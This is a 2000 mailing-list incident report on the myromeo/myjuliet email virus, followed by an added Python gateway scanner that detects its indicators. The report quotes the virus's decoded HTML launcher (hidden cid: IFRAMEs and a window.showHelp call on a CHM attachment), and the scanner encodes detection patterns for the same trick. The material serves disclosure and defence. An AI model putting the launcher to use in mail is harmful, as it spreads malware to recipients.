Security Incidents mailing list archives
new virus - myromeo
From: Piotr Klaban <makler () MAN TORUN PL>
Date: Thu, 16 Nov 2000 09:19:54 +0100
Hi,

Our nets were affected by the new mail virus - myromeo/myjuliet. This would not be recognized by e.g. AVP with the current virus database. Maybe you need to block it "by hand".

WHAT IT DOES TO THE COMPUTER:

Since I do not use Windows frequently, I do not know if this virus does something bad to the computer. I have only the information described below.

HOW IT WORKS:

The mail opens an html page, and magically runs the exe part. After that it spreads across the net by mailing itself, connecting to the following smtp sites (it seems they are open relays):

212.244.199.2  - gate.panoramix.net.pl (down for now)
195.117.152.91 - dns.inter-grafix.com.pl (does not answer. overloaded?)
195.116.62.86  - madmax.quadrosoft.com
194.153.216.60 - mail1.getin.pl (open relay)

madmax is not an open relay now, but it was yesterday (?):

<from the mail>
Received: from kmgwza (xxx [ip-num])
        by madmax.quadrosoft.com (8.9.3/8.9.3) with SMTP id KAA11833;
        Wed, 15 Nov 2000 10:03:25 +0100
</from the mail>

getin.pl is an open relay and responds with the following line:

220-mail1.getin.pl Microsoft SMTP MAIL ready at Thu, 16 Nov 2000 ... \
    Version: 5.5.1877.357.35

VIRUS MAIL:

There are a few attachments in the virus mail:

  1     <no description>    [multipa/alternativ, 7bit, 0.7K]
  2  +-><no description>    [text/plain, quoted, iso-8859-2, 0K]
  3  +-><no description>    [text/html, quoted, iso-8859-2, 0.4K]
  4     myromeo.exe         [applica/x-msdownlo, base64, 38K]
  5     myjuliet.chm        [applica/octet-stre, base64, 8.5K]

myromeo.exe is packed with UPX (very good pack utility).

The html part consists of a few lines (quoted-printable decoded, "=3D" is "="):

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
</HEAD>
<BODY BGCOLOR="black" TEXT="red">
<DIV> </DIV>
<IFRAME width=1 height=1 src="cid:000701bf8458$eb570380$dc0732d4@666"></IFRAME>
<IFRAME width=1 height=1 src="cid:000701bf8458$eb570381$dc0732d4@666"></IFRAME>
<P></P>
<SCRIPT>
window.showHelp("c:/windows/temp/myjuliet.chm");
</SCRIPT>
</BODY></HTML>

Maybe Outlook Express needs to be unpatched to run that, I do not know, but users say that the attachment runs by itself.

Best regards,

-- 
Piotr Klaban
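The mechanism the report describes (1x1 IFRAMEs whose src is a cid: reference to the attachments, plus an inline script that calls window.showHelp() on a CHM dropped in the temp directory) is easy to screen for at a mail gateway when the scanner signatures are not there yet. The following is an added example and not part of Piotr Klaban's message or of any product: a small Python scanner that parses one message, records .exe/.chm attachments by Content-ID, checks whether IFRAMEs in the HTML part reference them, and looks for showHelp() in inline script. The sample message it builds only mirrors the reported part layout; its Content-IDs (exe-part@example, chm-part@example), addresses and dummy payload bytes are constructed for the example, as is the RISKY_EXTENSIONS list.

```python
"""Added example: gateway check for mail shaped like the myromeo/myjuliet
mailer described in the report above. Not code from the original message."""
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser

# Attachment types named in the report; the list itself is this example's assumption.
RISKY_EXTENSIONS = {".exe", ".chm"}
SHOWHELP_RE = re.compile(r"showHelp\s*\(", re.IGNORECASE)


class HtmlIndicators(HTMLParser):
    """Collects cid: IFRAME targets and inline <script> bodies from one HTML part."""

    def __init__(self):
        super().__init__()
        self.cid_frames = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            src = (attrs.get("src") or "").strip()
            if src.lower().startswith("cid:"):
                self.cid_frames.append(src[4:].strip("<>"))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_message(raw: bytes) -> dict:
    """Parse one RFC 822 message and report whether (and why) it should be blocked."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    risky = {}  # Content-ID (angle brackets stripped) or filename -> filename
    html = HtmlIndicators()
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in RISKY_EXTENSIONS:
            cid = (part.get("Content-ID") or "").strip("<> ")
            risky[cid or name] = name
        elif part.get_content_type() == "text/html":
            html.feed(part.get_content())
    referenced = sorted(cid for cid in html.cid_frames if cid in risky)
    uses_showhelp = any(SHOWHELP_RE.search(s) for s in html.scripts)

    reasons = []
    if risky:
        reasons.append("risky attachments: " + ", ".join(sorted(risky.values())))
    if referenced:
        reasons.append("IFRAME(s) load attachment(s) by cid: " + ", ".join(referenced))
    if uses_showhelp:
        reasons.append("inline script calls showHelp()")
    # Block when an IFRAME pulls in a risky attachment, or when risky attachments
    # travel together with a showHelp() call even if the cid: link did not match.
    return {"block": bool(referenced or (risky and uses_showhelp)), "reasons": reasons}


def build_sample() -> bytes:
    """Constructed stand-in for the reported mail: same part layout, dummy payloads."""
    page = ('<HTML><BODY BGCOLOR="black" TEXT="red">\n'
            '<IFRAME width=1 height=1 src="cid:exe-part@example"></IFRAME>\n'
            '<IFRAME width=1 height=1 src="cid:chm-part@example"></IFRAME>\n'
            '<SCRIPT>window.showHelp("c:/windows/temp/myjuliet.chm");</SCRIPT>\n'
            '</BODY></HTML>\n')
    msg = EmailMessage()
    msg["From"] = "kmgwza@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "myromeo"
    msg.set_content("(empty)")
    msg.add_alternative(page, subtype="html")
    # Dummy bytes stand in for the binaries; only names and Content-IDs matter here.
    msg.add_attachment(b"MZ\x00\x00", maintype="application", subtype="x-msdownload",
                       filename="myromeo.exe", cid="<exe-part@example>")
    msg.add_attachment(b"ITSF\x03\x00", maintype="application", subtype="octet-stream",
                       filename="myjuliet.chm", cid="<chm-part@example>")
    return msg.as_bytes()


def build_benign() -> bytes:
    """Constructed control: ordinary HTML mail with a PDF attachment, no cid: frames."""
    msg = EmailMessage()
    msg["Subject"] = "invoice"
    msg.set_content("See attached.")
    msg.add_alternative("<html><body><p>See attached.</p></body></html>", subtype="html")
    msg.add_attachment(b"%PDF-1.4", maintype="application", subtype="pdf",
                       filename="invoice.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for label, raw in (("sample", build_sample()), ("benign", build_benign())):
        print(label, scan_message(raw))
```

The check keys on the combination rather than on either signal alone: a cid: IFRAME is common in legitimate HTML mail that embeds images, and an .exe attachment by itself is a policy question, but an IFRAME that pulls in an executable or CHM attachment, or a showHelp() call riding along with such attachments, matches the mailer described above and nothing a normal message needs.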
Current thread:
- new virus - myromeo Piotr Klaban (Nov 17)
- <Possible follow-ups>
- Re: new virus - myromeo Justin Mason (Nov 18)